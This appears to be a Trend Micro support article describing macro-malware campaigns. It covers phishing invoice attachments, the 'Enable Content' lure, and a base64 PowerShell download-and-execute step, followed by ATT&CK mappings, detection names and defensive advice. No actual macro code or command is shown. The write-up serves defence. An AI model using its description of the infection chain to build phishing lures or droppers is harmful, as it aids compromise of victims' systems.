Sign In with your
Trend Micro Account
Need Help?
Need More Help?

Create a technical support case if you need further support.

Macro-enabled documents for downloading Malware

    • Updated:
    • 21 Oct 2020
    • Product/Version:
    • Platform:
Summary

Macro is a set of commands that automates a software to perform a certain action. Threat actors took advantage of this and came up with Macro Malwares. This form of malware is known for being abusive of the VBA (Visual Basic for Application) programming in Microsoft Office macros to spread other forms of malware. These are often delivered through phishing emails, wherein the attacker lures the recipient to open the attached document. Once opened, security warning will show on the page and the document will instruct the recipient to “Enable Content”. After that, the macro will run and the recipient is affected.

What the malicious macro typically does upon enabling is that it executes a base64 PowerShell code which will download a file in %UserProfile% or in %Temp%. This downloaded file will run soon afterwards.

Infection Chain:

Behaviors:

  • Delivers other malware payloads
  • Uses macro
  • Steals computer data, computer name, system local, operating system (OS) version and running processes

Impact:

  • Compromised system security, with backdoor capabilities that can execute malicious commands

Sample Spam (Invoice Attachment)

Sample Document - "Enable Content"

  • MS Word

  • MS Excel

Sample Macro

  • MS Word

  • MS Excel

MITRE ATT&CK Matrix

BEHAVIORTACTICTECHNIQUE
Malware arrives as an attachmentInitial AccessT1566.001 Phishing: Spearphishing Attachment
Victim is lured into opening the attachmentExecutionT1204.002 User Execution: Malicious File
Downloaded document has obfuscated macros to hide URLs hosting the malwareDefense EvasionT1027 Obfuscated Files or Information
Macro-enabled document will download and execute payload using powershell commandExecutionT1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
Details
Public

Available Solutions:

Solution ModulesSolution AvailablePattern BranchRelease DateDetection/Policy/Rules
Email ProtectionYesAS Pattern 5630August 28, 2020-
URL ProtectionYesIn the Cloud--
Advanced Threat Scan Engine (ATSE)Yes16.191.00August 28, 2020-
Predictive Learning (TrendX)YesIn the Cloud-Downloader.VBA.TRX.XXVBAF01FF009
File detection (VSAPI)YesENT OPR 16.191.00August 28, 2020Trojan.W97M.EMOTET.TIOIBEKL
Trojan.W97M.EMOTET.TIOIBEKN
Trojan.W97M.ICEDID.AL
Trojan.W97M.POWLOAD.EMI
Trojan.W97M.POWLOAD.EMJ
Trojan.W97M.POWLOAD.TIOIBEMH
Trojan.W97M.POWLOAD.TIOIBEMN
Trojan.W97M.TRICKBOT.OD
Trojan.X97M.POWLOAD.USMANFOGEK
Trojan.X97M.POWLOAD.USNA
Behavioral Monitoring (AEGIS)YesTMTD OPR 2163August 27, 20204560T

Additional Threat Information Reference:

Recommendations:

  • Always enable/use macro security function on Microsoft Word and Excel.
  • Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to download a Word or Excel document, forward the contents to a member of the IT staff.
  • If you continuously receive email attachments with macro from spam campaigns, you may utilize IMSVA’s macro scanning.
Premium
Internal
Partner
Rating:
Category:
Remove a Malware / Virus
Solution Id:
000279049
Feedback
Did this article help you?

Thank you for your feedback!

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.

If you need additional help, you may try to contact the support team. Contact Support

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.